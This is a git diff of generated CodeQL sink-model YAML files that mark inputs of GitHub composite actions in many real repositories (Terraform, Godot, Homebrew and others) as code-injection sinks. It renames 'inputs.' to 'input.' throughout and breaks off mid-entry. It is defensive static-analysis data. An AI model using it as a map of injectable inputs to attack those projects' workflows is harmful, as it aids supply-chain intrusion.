diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml
index ca4dc84bbfc2..842240cfaa20 100644
--- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml
+++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["forcedotcom/salesforcedx-vscode", "*", "inputs.email", "code-injection", "generated"]
\ No newline at end of file
+ - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml
index caa6432efa9e..8ff5ee1e2c0a 100644
--- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml
+++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["fossasia/visdom", "*", "inputs.loadprbuild", "code-injection", "generated"]
- - ["fossasia/visdom", "*", "inputs.usebasebranch", "code-injection", "generated"]
\ No newline at end of file
+ - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"]
+ - ["fossasia/visdom", "*", "input.usebasebranch", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml
index a2e78841f692..29c5f793fb24 100644
--- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml
+++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["freckle/stack-action", "*", "inputs.find-options", "code-injection", "generated"]
\ No newline at end of file
+ - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml
index fbb76ae46e88..2f12293df0ed 100644
--- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml
+++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["freeradius/freeradius-server", "*", "inputs.gcc_ver", "code-injection", "generated"]
- - ["freeradius/freeradius-server", "*", "inputs.llvm_ver", "code-injection", "generated"]
- - ["freeradius/freeradius-server", "*", "inputs.sql_mysql_test_server", "code-injection", "generated"]
\ No newline at end of file
+ - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"]
+ - ["freeradius/freeradius-server", "*", "input.llvm_ver", "code-injection", "generated"]
+ - ["freeradius/freeradius-server", "*", "input.sql_mysql_test_server", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml
index 23d001db673e..83012e513359 100644
--- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml
+++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["gaphor/gaphor", "*", "inputs.version", "code-injection", "generated"]
- - ["gaphor/gaphor", "*", "inputs.base64_encoded_pfx", "code-injection", "generated"]
\ No newline at end of file
+ - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"]
+ - ["gaphor/gaphor", "*", "input.base64_encoded_pfx", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml
index 94c7adf250af..8ca211961948 100644
--- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml
+++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["getsentry/action-release", "*", "inputs.working_directory", "code-injection", "generated"]
\ No newline at end of file
+ - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml
index 85632a06a75b..7f19fd1f6a6f 100644
--- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml
+++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["github/codeql-action", "*", "inputs.latest_tag", "code-injection", "generated"]
- - ["github/codeql-action", "*", "inputs.major_version", "code-injection", "generated"]
- - ["github/codeql-action", "*", "inputs.version", "code-injection", "generated"]
- - ["github/codeql-action", "*", "inputs.use-all-platform-bundle", "code-injection", "generated"]
- - ["github/codeql-action", "*", "inputs.expected-config-file-contents", "code-injection", "generated"]
\ No newline at end of file
+ - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"]
+ - ["github/codeql-action", "*", "input.major_version", "code-injection", "generated"]
+ - ["github/codeql-action", "*", "input.version", "code-injection", "generated"]
+ - ["github/codeql-action", "*", "input.use-all-platform-bundle", "code-injection", "generated"]
+ - ["github/codeql-action", "*", "input.expected-config-file-contents", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml
index 9f002168214b..1889fcff1441 100644
--- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml
+++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["github/ruby", "*", "inputs.builddir", "code-injection", "generated"]
- - ["github/ruby", "*", "inputs.srcdir", "code-injection", "generated"]
- - ["github/ruby", "*", "inputs.test-opts", "code-injection", "generated"]
- - ["github/ruby", "*", "inputs.report-path", "code-injection", "generated"]
- - ["github/ruby", "*", "inputs.launchable-token", "code-injection", "generated"]
\ No newline at end of file
+ - ["github/ruby", "*", "input.builddir", "code-injection", "generated"]
+ - ["github/ruby", "*", "input.srcdir", "code-injection", "generated"]
+ - ["github/ruby", "*", "input.test-opts", "code-injection", "generated"]
+ - ["github/ruby", "*", "input.report-path", "code-injection", "generated"]
+ - ["github/ruby", "*", "input.launchable-token", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml
index f1191e5c1c6d..f8243352f455 100644
--- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml
+++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["gittools/gitversion", "*", "inputs.distro", "code-injection", "generated"]
- - ["gittools/gitversion", "*", "inputs.targetFramework", "code-injection", "generated"]
- - ["gittools/gitversion", "*", "inputs.arch", "code-injection", "generated"]
\ No newline at end of file
+ - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"]
+ - ["gittools/gitversion", "*", "input.targetFramework", "code-injection", "generated"]
+ - ["gittools/gitversion", "*", "input.arch", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml
index b0e30669c2ec..bd2015a70964 100644
--- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml
+++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["go-spatial/tegola", "*", "inputs.artifact_name", "code-injection", "generated"]
- - ["go-spatial/tegola", "*", "inputs.name", "code-injection", "generated"]
\ No newline at end of file
+ - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"]
+ - ["go-spatial/tegola", "*", "input.name", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml
index e26f0a886d91..501123a82fe5 100644
--- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml
+++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["goauthentik/authentik", "*", "inputs.postgresql_version", "code-injection", "generated"]
\ No newline at end of file
+ - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml
index 4b40b2fda8a5..1a17e3db2b8c 100644
--- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml
+++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["godotengine/godot", "*", "inputs.bin", "code-injection", "generated"]
- - ["godotengine/godot", "*", "inputs.tests", "code-injection", "generated"]
- - ["godotengine/godot", "*", "inputs.target", "code-injection", "generated"]
- - ["godotengine/godot", "*", "inputs.platform", "code-injection", "generated"]
\ No newline at end of file
+ - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"]
+ - ["godotengine/godot", "*", "input.tests", "code-injection", "generated"]
+ - ["godotengine/godot", "*", "input.target", "code-injection", "generated"]
+ - ["godotengine/godot", "*", "input.platform", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml
index 06b6e37ea1c7..a125a4bfa8c6 100644
--- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml
+++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["google/dagger", "*", "inputs.agp", "code-injection", "generated"]
\ No newline at end of file
+ - ["google/dagger", "*", "input.agp", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml
index dab53d9d5a37..e8d0cc64792b 100644
--- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml
+++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["googleapis/java-cloud-bom", "*", "inputs.bom-path", "code-injection", "generated"]
\ No newline at end of file
+ - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml
index ce485e688f25..736c84b68ccf 100644
--- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml
+++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["googleapis/sdk-platform-java", "*", "inputs.bom-path", "code-injection", "generated"]
\ No newline at end of file
+ - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml
index ab1cac6b6919..acb5d462d15a 100644
--- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml
+++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"]
+ - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"]
 - addsTo:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml
index 82d69349e3ae..aedeb4e1023c 100644
--- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml
+++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"]
\ No newline at end of file
+ - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml
index 13a6bfe9233a..0d8afb086c94 100644
--- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml
+++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["gravitational/teleport", "*", "inputs.target", "code-injection", "generated"]
- - ["gravitational/teleport", "*", "inputs.attempts", "code-injection", "generated"]
- - ["gravitational/teleport", "*", "inputs.flags", "code-injection", "generated"]
- - ["gravitational/teleport", "*", "inputs.path", "code-injection", "generated"]
- - ["gravitational/teleport", "*", "inputs.bin", "code-injection", "generated"]
\ No newline at end of file
+ - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"]
+ - ["gravitational/teleport", "*", "input.attempts", "code-injection", "generated"]
+ - ["gravitational/teleport", "*", "input.flags", "code-injection", "generated"]
+ - ["gravitational/teleport", "*", "input.path", "code-injection", "generated"]
+ - ["gravitational/teleport", "*", "input.bin", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml
index 163abb261858..4756acbf306f 100644
--- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml
+++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["grote/transportr", "*", "inputs.api-level", "code-injection", "generated"]
\ No newline at end of file
+ - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml
index 3be0de433299..a0e4acec75a0 100644
--- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml
+++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["hashicorp/nomad", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
+ - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml
index 2b0b84e172bf..6acfcf9773f5 100644
--- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml
+++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["hashicorp/terraform", "*", "inputs.target-terraform-branch", "code-injection", "generated"]
- - ["hashicorp/terraform", "*", "inputs.target-terraform-version", "code-injection", "generated"]
- - ["hashicorp/terraform", "*", "inputs.target-arch", "code-injection", "generated"]
- - ["hashicorp/terraform", "*", "inputs.target-os", "code-injection", "generated"]
- - ["hashicorp/terraform", "*", "inputs.target-equivalence-test-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"]
+ - ["hashicorp/terraform", "*", "input.target-terraform-version", "code-injection", "generated"]
+ - ["hashicorp/terraform", "*", "input.target-arch", "code-injection", "generated"]
+ - ["hashicorp/terraform", "*", "input.target-os", "code-injection", "generated"]
+ - ["hashicorp/terraform", "*", "input.target-equivalence-test-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml
index ba213f0363bb..7e0deeea9065 100644
--- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml
+++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["hashicorp/vault", "*", "inputs.destination", "code-injection", "generated"]
- - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"]
+ - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"]
+ - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"]
 - addsTo:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml
index d93b946f3d74..18678fe9ecd2 100644
--- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml
+++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["home-assistant/android", "*", "inputs.lokalise-token", "code-injection", "generated"]
- - ["home-assistant/android", "*", "inputs.lokalise-project", "code-injection", "generated"]
- - ["home-assistant/android", "*", "inputs.tag-name", "code-injection", "generated"]
\ No newline at end of file
+ - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"]
+ - ["home-assistant/android", "*", "input.lokalise-project", "code-injection", "generated"]
+ - ["home-assistant/android", "*", "input.tag-name", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml
index 40adbe1fc29b..d9d492f79cd5 100644
--- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml
+++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml
@@ -3,12 +3,12 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["homebrew/actions", "*", "inputs.casks", "code-injection", "generated"]
- - ["homebrew/actions", "*", "inputs.formulae", "code-injection", "generated"]
- - ["homebrew/actions", "*", "inputs.signing_key", "code-injection", "generated"]
- - ["homebrew/actions", "*", "inputs.workflow-name", "code-injection", "generated"]
- - ["homebrew/actions", "*", "inputs.collapse", "code-injection", "generated"]
- - ["homebrew/actions", "*", "inputs.step_name", "code-injection", "generated"]
- - ["homebrew/actions", "*", "inputs.result_path", "code-injection", "generated"]
- - ["homebrew/actions", "*", "inputs.workdir", "code-injection", "generated"]
- - ["homebrew/actions", "*", "inputs.script", "code-injection", "generated"]
\ No newline at end of file
+ - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"]
+ - ["homebrew/actions", "*", "input.formulae", "code-injection", "generated"]
+ - ["homebrew/actions", "*", "input.signing_key", "code-injection", "generated"]
+ - ["homebrew/actions", "*", "input.workflow-name", "code-injection", "generated"]
+ - ["homebrew/actions", "*", "input.collapse", "code-injection", "generated"]
+ - ["homebrew/actions", "*", "input.step_name", "code-injection", "generated"]
+ - ["homebrew/actions", "*", "input.result_path", "code-injection", "generated"]
+ - ["homebrew/actions", "*", "input.workdir", "code-injection", "generated"]
+ - ["homebrew/actions", "*", "input.script", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml
index 293d8a832bd4..d3046ff1fc40 100644
--- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml
+++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["hyperledger/aries-cloudagent-python", "*", "inputs.TEST_SCOPE", "code-injection", "generated"]
\ No newline at end of file
+ - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml
index c72000641cec..845fba40a6cf 100644
--- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml
+++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["hyperledger/fabric-samples", "*", "inputs.ca-version", "code-injection", "generated"]
- - ["hyperledger/fabric-samples", "*", "inputs.fabric-version", "code-injection", "generated"]
- - ["hyperledger/fabric-samples", "*", "inputs.k9s-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"]
+ - ["hyperledger/fabric-samples", "*", "input.fabric-version", "code-injection", "generated"]
+ - ["hyperledger/fabric-samples", "*", "input.k9s-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml
index 53929ab8ed1a..bcf51805710b 100644
--- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml
+++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["igniterealtime/openfire", "*", "inputs.domain", "code-injection", "generated"]
- - ["igniterealtime/openfire", "*", "inputs.ip", "code-injection", "generated"]
- - ["igniterealtime/openfire", "*", "inputs.distBaseDir", "code-injection", "generated"]
\ No newline at end of file
+ - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"]
+ - ["igniterealtime/openfire", "*", "input.ip", "code-injection", "generated"]
+ - ["igniterealtime/openfire", "*", "input.distBaseDir", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml
index 1330f370747e..e1ff1fa3497c 100644
--- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml
+++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["infracost/actions", "*", "inputs.behavior", "code-injection", "generated"]
\ No newline at end of file
+ - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml
index d9d9c6770bc0..4c5ef712e587 100644
--- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml
+++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml
@@ -3,16 +3,16 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["inspektor-gadget/inspektor-gadget", "*", "inputs.runtime", "code-injection", "generated"]
- - ["inspektor-gadget/inspektor-gadget", "*", "inputs.registry", "code-injection", "generated"]
- - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container-image", "code-injection", "generated"]
- - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_tag", "code-injection", "generated"]
- - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_repository", "code-injection", "generated"]
- - ["inspektor-gadget/inspektor-gadget", "*", "inputs.dnstester_image", "code-injection", "generated"]
- - ["inspektor-gadget/inspektor-gadget", "*", "inputs.image_tag", "code-injection", "generated"]
- - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container_repo", "code-injection", "generated"]
- - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_architecture", "code-injection", "generated"]
- - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_distribution", "code-injection", "generated"]
- - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-step-conclusion", "code-injection", "generated"]
- - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-summary-suffix", "code-injection", "generated"]
- - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-log-file", "code-injection", "generated"]
\ No newline at end of file
+ - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"]
+ - ["inspektor-gadget/inspektor-gadget", "*", "input.registry", "code-injection", "generated"]
+ - ["inspektor-gadget/inspektor-gadget", "*", "input.container-image", "code-injection", "generated"]
+ - ["inspektor-gadget/inspektor-gadget", "*", "input.gadget_tag", "code-injection", "generated"]
+ - ["inspektor-gadget/inspektor-gadget", "*", "input.gadget_repository", "code-injection", "generated"]
+ - ["inspektor-gadget/inspektor-gadget", "*", "input.dnstester_image", "code-injection", "generated"]
+ - ["inspektor-gadget/inspektor-gadget", "*", "input.image_tag", "code-injection", "generated"]
+ - ["inspektor-gadget/inspektor-gadget", "*", "input.container_repo", "code-injection", "generated"]
+ - ["inspektor-gadget/inspektor-gadget", "*", "input.kubernetes_architecture", "code-injection", "generated"]
+ - ["inspektor-gadget/inspektor-gadget", "*", "input.kubernetes_distribution", "code-injection", "generated"]
+ - ["inspektor-gadget/inspektor-gadget", "*", "input.test-step-conclusion", "code-injection", "generated"]
+ - ["inspektor-gadget/inspektor-gadget", "*", "input.test-summary-suffix", "code-injection", "generated"]
+ - ["inspektor-gadget/inspektor-gadget", "*", "input.test-log-file", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml
index faf1d7ed5c53..31e1f562877e 100644
--- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml
+++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["intel-analytics/ipex-llm", "*", "inputs.extra-dependency", "code-injection", "generated"]
\ No newline at end of file
+ - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml
index 12ae92c149b7..298ba1ccbe3b 100644
--- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml
+++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml
@@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ionic-team/ionic-framework", "*", "inputs.totalShards", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.shard", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.component", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.paths", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.output", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.app", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.stencil-version", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.folder", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.tag", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.preid", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.shard", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.component", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.app", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.stencil-version", "code-injection", "generated"] + - 